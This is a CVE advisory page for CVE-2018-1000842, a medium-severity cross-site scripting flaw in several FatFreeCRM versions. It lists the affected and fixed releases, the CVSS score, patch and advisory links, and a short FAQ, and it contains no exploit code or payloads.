Vulnerability Description
FatFreeCRM version <=0.14.1, >=0.15.0 <=0.15.1, >=0.16.0 <=0.16.3, >=0.17.0 <=0.17.2, ==0.18.0 contains a Cross Site Scripting (XSS) vulnerability in commit 6d60bc8ed010c4eda05d6645c64849f415f68d65 that can result in Javascript execution. This attack appear to be exploitable via Content with Javascript payload will be executed on end user browsers when they visit the page. This vulnerability appears to have been fixed in 0.18.1, 0.17.3, 0.16.4, 0.15.2, 0.14.2.
CVSS Score
MEDIUM
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Fatfreecrm | Fatfreecrm | <= 0.14.1 |
Related Weaknesses (CWE)
References
- https://github.com/asteinhauser/fat_free_crm/commit/306f940b26ccf3f406665f07becePatch
- https://github.com/asteinhauser/fat_free_crm/issues/1Third Party Advisory
- https://github.com/fatfreecrm/fat_free_crm/wiki/XSS-Vulnerability-%282018-10-27%PatchThird Party Advisory
- https://groups.google.com/forum/#%21topic/fat-free-crm-users/TxsdZXSe7Jc
- https://github.com/asteinhauser/fat_free_crm/commit/306f940b26ccf3f406665f07becePatch
- https://github.com/asteinhauser/fat_free_crm/issues/1Third Party Advisory
- https://github.com/fatfreecrm/fat_free_crm/wiki/XSS-Vulnerability-%282018-10-27%PatchThird Party Advisory
- https://groups.google.com/forum/#%21topic/fat-free-crm-users/TxsdZXSe7Jc
FAQ
What is CVE-2018-1000842?
CVE-2018-1000842 is a vulnerability with a CVSS score of 6.1 (MEDIUM). FatFreeCRM version <=0.14.1, >=0.15.0 <=0.15.1, >=0.16.0 <=0.16.3, >=0.17.0 <=0.17.2, ==0.18.0 contains a Cross Site Scripting (XSS) vulnerability in commit 6d60bc8ed010c4eda05d6645c64849f415f68d65 th...
How severe is CVE-2018-1000842?
CVE-2018-1000842 has been rated MEDIUM with a CVSS base score of 6.1/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2018-1000842?
Check the references section above for vendor advisories and patch information. Affected products include: Fatfreecrm Fatfreecrm.